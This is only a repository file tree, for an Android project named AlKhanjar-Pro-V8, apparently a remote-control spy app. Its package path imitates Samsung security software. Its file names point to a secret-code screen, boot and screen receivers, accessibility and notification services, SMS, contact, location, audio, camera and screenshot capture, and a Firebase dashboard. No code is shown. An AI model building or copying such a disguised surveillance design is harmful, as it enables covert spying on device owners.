# AlKhanjar-Pro-V8

./: BUILD_GUIDE.md  NOTES.txt  README.md
.github/workflows/: android.yml
android-app/: build.gradle  build.sh  gradlew  settings.gradle
android-app/app/: build.gradle  google-services.json  proguard-rules.pro
android-app/app/src/main/: AndroidManifest.xml
android-app/app/src/main/java/com/samsung/android/security/v8/: AlKhanjarApp.java  MainActivity.java  R.java  SecretCodeActivity.java
android-app/app/src/main/java/com/samsung/android/security/v8/core/: CommandExecutor.java
android-app/app/src/main/java/com/samsung/android/security/v8/receivers/: BootReceiver.java  CameraReceiver.java  ScreenReceiver.java
android-app/app/src/main/java/com/samsung/android/security/v8/services/: AccessibilityService.java  CoreService.java  NotificationListener.java
android-app/app/src/main/java/com/samsung/android/security/v8/utils/: AppsUtil.java  AudioUtil.java  CameraUtil.java  ContactsUtil.java  CryptoUtil.java  DeviceUtil.java  FilesUtil.java  LocationUtil.java  MemoryUtil.java  NotificationUtil.java  ScreenshotUtil.java  SmsUtil.java  StorageUtil.java
android-app/app/src/main/res/values/: strings.xml
web-dashboard/: index.html
web-dashboard/css/: style.css
web-dashboard/js/: app.js  firebase-config.js  package-lock.json
